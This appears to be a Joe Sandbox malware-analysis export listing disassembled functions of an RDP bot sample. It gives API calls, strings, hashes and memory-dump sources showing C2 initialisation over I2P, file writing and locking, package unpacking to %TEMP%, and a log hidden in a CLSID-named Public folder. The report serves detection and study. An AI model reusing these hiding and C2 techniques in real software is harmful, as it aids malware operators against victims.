Function 00007FFE1A52C63D Relevance: 33.4, APIs: 2, Strings: 17, Instructions: 180threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32 ref: 00007FFE1A52C852
GetLastError.KERNEL32 ref: 00007FFE1A52C8B3

Strings

cnc_init, xrefs: 00007FFE1A52C805, 00007FFE1A52C86B, 00007FFE1A52C89B, 00007FFE1A52C8C5
server_timeo, xrefs: 00007FFE1A52C6F3
[I] (%s) -> %s, xrefs: 00007FFE1A52C8A2
Done, xrefs: 00007FFE1A52C894
routine_rx, xrefs: 00007FFE1A52C864, 00007FFE1A52C8BE
[E] (%s) -> CreateThread(%s) failed(gle=%lu), xrefs: 00007FFE1A52C8CC
i2p_try_num, xrefs: 00007FFE1A52C734
server_port, xrefs: 00007FFE1A52C6B2
i2p_sam3_timeo, xrefs: 00007FFE1A52C775
server_host, xrefs: 00007FFE1A52C674
[E] (%s) -> Failed(err=%08x), xrefs: 00007FFE1A52C80C
~, xrefs: 00007FFE1A52C900
[I] (%s) -> CreateThread(%s) done, xrefs: 00007FFE1A52C872
i2p_addr, xrefs: 00007FFE1A52C7A8
, xrefs: 00007FFE1A52C8D8
cnccli, xrefs: 00007FFE1A52C67B, 00007FFE1A52C6B9, 00007FFE1A52C6FA, 00007FFE1A52C73B, 00007FFE1A52C77C, 00007FFE1A52C7AF
P, xrefs: 00007FFE1A52C905

Memory Dump Source

Source File: 00000017.00000002.2671492944.00007FFE1A521000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A520000, based on PE: true

Associated: 00000017.00000002.2671469595.00007FFE1A520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671532727.00007FFE1A533000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671563458.00007FFE1A534000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671595910.00007FFE1A53D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671627336.00007FFE1A540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671653548.00007FFE1A541000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671680913.00007FFE1A544000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe1a520000_main.jbxd

Similarity

API ID: CreateErrorLastThread
String ID: $Done$P$[E] (%s) -> CreateThread(%s) failed(gle=%lu)$[E] (%s) -> Failed(err=%08x)$[I] (%s) -> %s$[I] (%s) -> CreateThread(%s) done$cnc_init$cnccli$i2p_addr$i2p_sam3_timeo$i2p_try_num$routine_rx$server_host$server_port$server_timeo$~
API String ID: 1689873465-2891999747
Opcode ID: 69ff0dd040673d29dc0efb7132441b44c922c1686ba0aa4da5f9ac38d49a83f6
Instruction ID: 3a628aa79b5d4280338f8a6b4f871deded79df985f9dde14bc6fd8820dbf1761
Opcode Fuzzy Hash: 69ff0dd040673d29dc0efb7132441b44c922c1686ba0aa4da5f9ac38d49a83f6
Instruction Fuzzy Hash: 35914A61B0DE47C5FB618BD6A8803B422A1AF96F78F5402F7D85D4A2F2EF2CA545C341

Function 00007FF7C1AB4D2B Relevance: 33.4, APIs: 9, Strings: 10, Instructions: 133fileCOMMON

Download Yara Rule

APIs

fopen.MSVCRT ref: 00007FF7C1AB4D53
fclose.MSVCRT ref: 00007FF7C1AB4D85
_errno.MSVCRT ref: 00007FF7C1AB4E3F
_errno.MSVCRT ref: 00007FF7C1AB4E60
fwrite.MSVCRT ref: 00007FF7C1AB4ED4

Strings

(path != NULL), xrefs: 00007FF7C1AB4DE4
NULL, xrefs: 00007FF7C1AB4F8A, 00007FF7C1AB4F96
[E] (%s) -> fopen failed(path=%s,mode=%s,errno=%d), xrefs: 00007FF7C1AB4E54
[E] (%s) -> Failed(path=%s,mode=%s,err=%08x), xrefs: 00007FF7C1AB4DBC
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF7C1AB4DF2, 00007FF7C1AB4E22
[I] (%s) -> Done(path=%s,mode=%s,buf_sz=%llu), xrefs: 00007FF7C1AB4FB4
C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FF7C1AB4DDD, 00007FF7C1AB4E0D
fs_file_write, xrefs: 00007FF7C1AB4DB5, 00007FF7C1AB4DEB, 00007FF7C1AB4E1B, 00007FF7C1AB4E4D, 00007FF7C1AB4EFD, 00007FF7C1AB4FAD
(mode != NULL), xrefs: 00007FF7C1AB4E14
[E] (%s) -> fwrite failed(path=%s,mode=%s,errno=%d), xrefs: 00007FF7C1AB4F04

Memory Dump Source

Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true

Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd

Similarity

API ID: _errno$fclosefopenfwrite
String ID: (mode != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,mode=%s,err=%08x)$[E] (%s) -> fopen failed(path=%s,mode=%s,errno=%d)$[E] (%s) -> fwrite failed(path=%s,mode=%s,errno=%d)$[I] (%s) -> Done(path=%s,mode=%s,buf_sz=%llu)$fs_file_write
API String ID: 608220805-544371937
Opcode ID: 6bb662439ff0a9edd6456aef351c72a4391720da368e4311bf0ea69c9534dbcd
Instruction ID: 5fcbbafbe14f3cb32e3b2491a1346d07a5a76f7fc7b54925339b16bd3e366cbf
Opcode Fuzzy Hash: 6bb662439ff0a9edd6456aef351c72a4391720da368e4311bf0ea69c9534dbcd
Instruction Fuzzy Hash: BC516671B0D68289FB10FF559910ABCA361AF457A4FC80133E91E47791EEADE906C320

Function 00007FFE1A52328E Relevance: 31.7, APIs: 9, Strings: 9, Instructions: 177stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FFE1A5232AD
CreateDirectoryA.KERNEL32 ref: 00007FFE1A5232CF
GetLastError.KERNEL32 ref: 00007FFE1A523320
strcpy.MSVCRT ref: 00007FFE1A523371
strlen.MSVCRT ref: 00007FFE1A523379
strlen.MSVCRT ref: 00007FFE1A523395
strlen.MSVCRT ref: 00007FFE1A5233A6
CreateDirectoryA.KERNEL32 ref: 00007FFE1A523417
GetLastError.KERNEL32 ref: 00007FFE1A523421

Strings

fs_dir_create, xrefs: 00007FFE1A5232FE, 00007FFE1A523332, 00007FFE1A5233C9, 00007FFE1A5234EF, 00007FFE1A523556
NULL, xrefs: 00007FFE1A523547
[I] (%s) -> Done(path=%s,recursive=%d), xrefs: 00007FFE1A52355D
C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FFE1A5232F0
(path != NULL), xrefs: 00007FFE1A5232F7
[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,ptr=%s,gle=%lu), xrefs: 00007FFE1A5233D0
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE1A523305
[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,gle=%lu), xrefs: 00007FFE1A523339
[E] (%s) -> Failed(path=%s,recursive=%d,err=%08x), xrefs: 00007FFE1A5234F6

Memory Dump Source

Source File: 00000017.00000002.2671492944.00007FFE1A521000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A520000, based on PE: true

Associated: 00000017.00000002.2671469595.00007FFE1A520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671532727.00007FFE1A533000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671563458.00007FFE1A534000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671595910.00007FFE1A53D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671627336.00007FFE1A540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671653548.00007FFE1A541000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671680913.00007FFE1A544000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe1a520000_main.jbxd

Similarity

API ID: strlen$CreateDirectoryErrorLast$strcpy
String ID: (path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,gle=%lu)$[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,ptr=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,recursive=%d,err=%08x)$[I] (%s) -> Done(path=%s,recursive=%d)$fs_dir_create
API String ID: 1104438493-1059260517
Opcode ID: 04542ae5c1f5461983f5d04dea1494922f9644e84bc8b476523380548322e74a
Instruction ID: 48018174b20294888601b31c87b85573106c88ce568d2150d80954bb23a6a2a5
Opcode Fuzzy Hash: 04542ae5c1f5461983f5d04dea1494922f9644e84bc8b476523380548322e74a
Instruction Fuzzy Hash: 84716B12B0CE43C6FA615B97A4843B91252AFA7F74F5810F3D94E472B2EE2CE945C341

Function 00007FFE11EC5E9E Relevance: 31.7, APIs: 9, Strings: 9, Instructions: 177stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FFE11EC5EBD
CreateDirectoryA.KERNEL32 ref: 00007FFE11EC5EDF
GetLastError.KERNEL32 ref: 00007FFE11EC5F30
strcpy.MSVCRT ref: 00007FFE11EC5F81
strlen.MSVCRT ref: 00007FFE11EC5F89
strlen.MSVCRT ref: 00007FFE11EC5FA5
strlen.MSVCRT ref: 00007FFE11EC5FB6
CreateDirectoryA.KERNEL32 ref: 00007FFE11EC6027
GetLastError.KERNEL32 ref: 00007FFE11EC6031

Strings

[E] (%s) -> Failed(path=%s,recursive=%d,err=%08x), xrefs: 00007FFE11EC6106
[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,gle=%lu), xrefs: 00007FFE11EC5F49
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE11EC5F15
[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,ptr=%s,gle=%lu), xrefs: 00007FFE11EC5FE0
fs_dir_create, xrefs: 00007FFE11EC5F0E, 00007FFE11EC5F42, 00007FFE11EC5FD9, 00007FFE11EC60FF, 00007FFE11EC6166
NULL, xrefs: 00007FFE11EC6157
C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FFE11EC5F00
[I] (%s) -> Done(path=%s,recursive=%d), xrefs: 00007FFE11EC616D
(path != NULL), xrefs: 00007FFE11EC5F07

Memory Dump Source

Source File: 00000017.00000002.2670746412.00007FFE11EC1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11EC0000, based on PE: true

Associated: 00000017.00000002.2670719444.00007FFE11EC0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2670780662.00007FFE11ED3000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2670837201.00007FFE11EDC000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2670908320.00007FFE11EDF000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2670942185.00007FFE11EE0000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe11ec0000_main.jbxd

Similarity

API ID: strlen$CreateDirectoryErrorLast$strcpy
String ID: (path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,gle=%lu)$[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,ptr=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,recursive=%d,err=%08x)$[I] (%s) -> Done(path=%s,recursive=%d)$fs_dir_create
API String ID: 1104438493-1059260517
Opcode ID: 723e7e1c9b4e9d2c0e6677df24c73e88ba84a21a4c6914f4dc0e9c11adef5464
Instruction ID: dbb44ee059780844e7c10c6ee606fce505ca30cee32228a6c878e8fc703e0251
Opcode Fuzzy Hash: 723e7e1c9b4e9d2c0e6677df24c73e88ba84a21a4c6914f4dc0e9c11adef5464
Instruction Fuzzy Hash: 09717D11B0CE8381FB205B97EC413BB56A8AF88765F9411B2D90E167F6DE2DF885C701

Function 00007FF7C1AB309C Relevance: 31.6, APIs: 8, Strings: 10, Instructions: 139stringfileCOMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00007FF7C1AB30BC
GetLastError.KERNEL32 ref: 00007FF7C1AB31ED

Part of subcall function 00007FF7C1AB1FD0: GetModuleHandleExA.KERNEL32(?,?,?,?,?,?,00007FF7C1AB162F), ref: 00007FF7C1AB1FEE

strlen.MSVCRT ref: 00007FF7C1AB310E
strlen.MSVCRT ref: 00007FF7C1AB312A
_mbscat.MSVCRT ref: 00007FF7C1AB3145
strlen.MSVCRT ref: 00007FF7C1AB314D
strlen.MSVCRT ref: 00007FF7C1AB3162
fopen.MSVCRT ref: 00007FF7C1AB3185

Strings

[E] (%s) -> Failed(err=%08x), xrefs: 00007FF7C1AB31D7
debug_init, xrefs: 00007FF7C1AB31AB, 00007FF7C1AB31D0, 00007FF7C1AB31F8, 00007FF7C1AB32BD, 00007FF7C1AB3331
[I] (%s) -> Log open success(flog_path=%s), xrefs: 00007FF7C1AB31B2
service, xrefs: 00007FF7C1AB309E
[E] (%s) -> Log open failed(flog_path=%s), xrefs: 00007FF7C1AB32C4
Done, xrefs: 00007FF7C1AB332A
[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu), xrefs: 00007FF7C1AB31FF
main.log, xrefs: 00007FF7C1AB316A
[I] (%s) -> %s, xrefs: 00007FF7C1AB3338
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.log, xrefs: 00007FF7C1AB30EE, 00007FF7C1AB3104, 00007FF7C1AB313B, 00007FF7C1AB3158, 00007FF7C1AB31A4

Memory Dump Source

Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true

Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd

Similarity

API ID: strlen$CountCriticalErrorHandleInitializeLastModuleSectionSpin_mbscatfopen
String ID: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.log$Done$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu)$[E] (%s) -> Log open failed(flog_path=%s)$[I] (%s) -> %s$[I] (%s) -> Log open success(flog_path=%s)$debug_init$main.log$service
API String ID: 3216678114-1460613360
Opcode ID: 8b7dcbde98ae6afe88b0399af49ac6b996af1102512ce647207782932fe25cf1
Instruction ID: e5d590a289226c908e8201a9f9c038965e5fad8dfc112d7f1ada2dba4095444d
Opcode Fuzzy Hash: 8b7dcbde98ae6afe88b0399af49ac6b996af1102512ce647207782932fe25cf1
Instruction Fuzzy Hash: 73511B64A0C79391FB20FF15A990BBDD664AF14764FD48433C90E0B396DEEEA985C321

Function 00007FF7C1AB7750 Relevance: 29.9, APIs: 6, Strings: 11, Instructions: 193stringCOMMON

Download Yara Rule

APIs

_mbscat.MSVCRT ref: 00007FF7C1AB78D0
strlen.MSVCRT ref: 00007FF7C1AB798E
_mbscpy.MSVCRT ref: 00007FF7C1AB79B6
_mbscpy.MSVCRT ref: 00007FF7C1AB7A0D
strlen.MSVCRT ref: 00007FF7C1AB7A15
strlen.MSVCRT ref: 00007FF7C1AB7A3F

Part of subcall function 00007FF7C1AB4FC5: fopen.MSVCRT ref: 00007FF7C1AB500A
Part of subcall function 00007FF7C1AB4FC5: fseek.MSVCRT ref: 00007FF7C1AB5029
Part of subcall function 00007FF7C1AB4FC5: _errno.MSVCRT ref: 00007FF7C1AB503D
Part of subcall function 00007FF7C1AB4FC5: _errno.MSVCRT ref: 00007FF7C1AB5058

Strings

(target != NULL), xrefs: 00007FF7C1AB7831
%TEMP%, xrefs: 00007FF7C1AB78B2
package_unpack, xrefs: 00007FF7C1AB77C9, 00007FF7C1AB7808, 00007FF7C1AB7838, 00007FF7C1AB7919, 00007FF7C1AB7A60, 00007FF7C1AB7A86
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF7C1AB780F, 00007FF7C1AB783F
C:/Projects/rdp/bot/codebase/package.c, xrefs: 00007FF7C1AB77FA, 00007FF7C1AB782A
[I] (%s) -> Entry unpack done(package=%s,target=%s,pkg_ent=%s,pkg_ent_sz=%u), xrefs: 00007FF7C1AB7A67
[E] (%s) -> Failed(package=%s,target=%s,err=%08x), xrefs: 00007FF7C1AB77D0
(package != NULL), xrefs: 00007FF7C1AB7801
NULL, xrefs: 00007FF7C1AB7A9E, 00007FF7C1AB7AAA
[I] (%s) -> Done(package=%s,target=%s), xrefs: 00007FF7C1AB7A8D
[E] (%s) -> Entry unpack failed(package=%s,target=%s,pkg_ent=%s,pkg_ent_sz=%u,err=%08x), xrefs: 00007FF7C1AB7920

Memory Dump Source

Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true

Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd

Similarity

API ID: strlen$_errno_mbscpy$_mbscatfopenfseek
String ID: %TEMP%$(package != NULL)$(target != NULL)$C:/Projects/rdp/bot/codebase/package.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Entry unpack failed(package=%s,target=%s,pkg_ent=%s,pkg_ent_sz=%u,err=%08x)$[E] (%s) -> Failed(package=%s,target=%s,err=%08x)$[I] (%s) -> Done(package=%s,target=%s)$[I] (%s) -> Entry unpack done(package=%s,target=%s,pkg_ent=%s,pkg_ent_sz=%u)$package_unpack
API String ID: 3066828623-21863935
Opcode ID: 450b15a3d360a3442c0a958e84f1eddc94a1de40b1d6f94e9d44005796073302
Instruction ID: 78090fe4952a62adf11f8417be799ff8492ad02a45845198cdcff86aca8abb0b
Opcode Fuzzy Hash: 450b15a3d360a3442c0a958e84f1eddc94a1de40b1d6f94e9d44005796073302
Instruction Fuzzy Hash: 99818B71A0868381FB11EF55E850BADA760AB443A4FC41033EE4D476D9DEFDE509C720

Function 00007FF7C1AB16E3 Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 179stringmemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7C1AB1FD0: GetModuleHandleExA.KERNEL32(?,?,?,?,?,?,00007FF7C1AB162F), ref: 00007FF7C1AB1FEE

strlen.MSVCRT ref: 00007FF7C1AB1758
strlen.MSVCRT ref: 00007FF7C1AB177A
_mbscpy.MSVCRT ref: 00007FF7C1AB1796
strlen.MSVCRT ref: 00007FF7C1AB179E
strlen.MSVCRT ref: 00007FF7C1AB17B5
FreeLibrary.KERNEL32 ref: 00007FF7C1AB17F1
GetProcessHeap.KERNEL32 ref: 00007FF7C1AB18AD
HeapAlloc.KERNEL32 ref: 00007FF7C1AB18C1
_mbscpy.MSVCRT ref: 00007FF7C1AB18D6

Strings

unit_init, xrefs: 00007FF7C1AB185F
[E] (%s) -> Failed(name=%s,err=%08x), xrefs: 00007FF7C1AB196E
unit_cleanup, xrefs: 00007FF7C1AB1876
units_init, xrefs: 00007FF7C1AB189A, 00007FF7C1AB1967, 00007FF7C1AB19A8
[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FF7C1AB190F
[I] (%s) -> Done(name=%s), xrefs: 00007FF7C1AB19AF
mem_alloc, xrefs: 00007FF7C1AB1908
[I] (%s) -> Loaded(f_path=%s), xrefs: 00007FF7C1AB18A1

Memory Dump Source

Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true

Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd

Similarity

API ID: strlen$Heap_mbscpy$AllocFreeHandleLibraryModuleProcess
String ID: [E] (%s) -> Failed(name=%s,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(name=%s)$[I] (%s) -> Loaded(f_path=%s)$mem_alloc$unit_cleanup$unit_init$units_init
API String ID: 548194777-214984806
Opcode ID: 629659c426d93b8d57d096e2e37c2bf68a0892dfe24888d4cace9c6043ea66ad
Instruction ID: 5e165798eb3d946468ca79faff21abc414b0ee1a22c1ae4c74fd44997a5351ff
Opcode Fuzzy Hash: 629659c426d93b8d57d096e2e37c2bf68a0892dfe24888d4cace9c6043ea66ad
Instruction Fuzzy Hash: 87815935A086C282FB61EF12A450BBDA6A1AF457A4FC44033DE4D47795EFADE905C360

Function 00007FF7C1AB685F Relevance: 28.2, APIs: 5, Strings: 11, Instructions: 199fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,?,?,?,?,?,?,?,?,service,00000157C50713D0,?,00007FF7C1AC8500,00007FF7C1AB1669), ref: 00007FF7C1AB68B7
LockFileEx.KERNEL32(?,?,?,?,?,?,?,?,?,service,00000157C50713D0,?,00007FF7C1AC8500,00007FF7C1AB1669), ref: 00007FF7C1AB68F0
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,service,00000157C50713D0,?,00007FF7C1AC8500,00007FF7C1AB1669), ref: 00007FF7C1AB69C5
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,service,00000157C50713D0,?,00007FF7C1AC8500,00007FF7C1AB1669), ref: 00007FF7C1AB6AAA
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,service,00000157C50713D0,?,00007FF7C1AC8500,00007FF7C1AB1669), ref: 00007FF7C1AB6C1E

Strings

(path != NULL), xrefs: 00007FF7C1AB6971
[I] (%s) -> Done(path=%s,lock=%p), xrefs: 00007FF7C1AB6C42
NULL, xrefs: 00007FF7C1AB6C29
(lock != NULL), xrefs: 00007FF7C1AB69A1
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF7C1AB694B
service, xrefs: 00007FF7C1AB6862
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF7C1AB697F, 00007FF7C1AB69AF
[E] (%s) -> LockFileEx failed(path=%s,gle=%lu), xrefs: 00007FF7C1AB6ABF
fs_file_lock, xrefs: 00007FF7C1AB6944, 00007FF7C1AB6978, 00007FF7C1AB69A8, 00007FF7C1AB69D3, 00007FF7C1AB6AB8, 00007FF7C1AB6C3B
C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FF7C1AB696A, 00007FF7C1AB699A
[E] (%s) -> CreateFileA failed(path=%s,gle=%lu), xrefs: 00007FF7C1AB69DA

Memory Dump Source

Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true

Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd

Similarity

API ID: ErrorFileLast$CloseCreateHandleLock
String ID: (lock != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateFileA failed(path=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> LockFileEx failed(path=%s,gle=%lu)$[I] (%s) -> Done(path=%s,lock=%p)$fs_file_lock$service
API String ID: 2747014929-2960251455
Opcode ID: 8b8c3ce000e0cef59537ce36c0357b001427b7c3ce90e8d3888594aba3ae448c
Instruction ID: 3dcda48a9095f45ef818d6e04e2d405be283e91b9ed10a63a65599741cad91ab
Opcode Fuzzy Hash: 8b8c3ce000e0cef59537ce36c0357b001427b7c3ce90e8d3888594aba3ae448c
Instruction Fuzzy Hash: 00810B70A4C78B81FB20FF54A450BBCA2509B11374E944233CD6E477E1EEEEA986D365

Function 00007FFE11BDB00C Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 139networkCOMMON

Download Yara Rule

APIs

socket.WS2_32 ref: 00007FFE11BDB030
htonl.WS2_32 ref: 00007FFE11BDB0CC
htons.WS2_32 ref: 00007FFE11BDB0DD
connect.WS2_32 ref: 00007FFE11BDB0F6
WSAGetLastError.WS2_32 ref: 00007FFE11BDB11C
select.WS2_32 ref: 00007FFE11BDB18C
WSAGetLastError.WS2_32 ref: 00007FFE11BDB19C
WSAGetLastError.WS2_32 ref: 00007FFE11BDB1DE

Part of subcall function 00007FFE11BDACA9: ioctlsocket.WS2_32 ref: 00007FFE11BDACCF

Part of subcall function 00007FFE11BDABF4: setsockopt.WS2_32 ref: 00007FFE11BDAC1C
Part of subcall function 00007FFE11BDABF4: setsockopt.WS2_32 ref: 00007FFE11BDAC48

WSAGetLastError.WS2_32 ref: 00007FFE11BDB20B

Strings

[E] (%s) -> select failed(sock=0x%llx,WSAgle=%d), xrefs: 00007FFE11BDB1AF
[E] (%s) -> connection failed(host=%08x,port=%u), xrefs: 00007FFE11BDB094
[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u), xrefs: 00007FFE11BDB24D
[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d), xrefs: 00007FFE11BDB223
[E] (%s) -> connect failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d), xrefs: 00007FFE11BDB1FA
tcp_connect, xrefs: 00007FFE11BDB08D, 00007FFE11BDB1A8, 00007FFE11BDB1C6, 00007FFE11BDB1F3, 00007FFE11BDB21C, 00007FFE11BDB246
[W] (%s) -> select timedout(sock=0x%llx,timeo=%u), xrefs: 00007FFE11BDB1CD

Memory Dump Source

Source File: 00000017.00000002.2670554696.00007FFE11BD1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE11BD0000, based on PE: true

Associated: 00000017.00000002.2670529835.00007FFE11BD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2670610717.00007FFE11BE6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2670638860.00007FFE11BF0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2670662364.00007FFE11BF3000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2670694177.00007FFE11BF4000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe11bd0000_main.jbxd

Similarity

API ID: ErrorLast$setsockopt$connecthtonlhtonsioctlsocketselectsocket
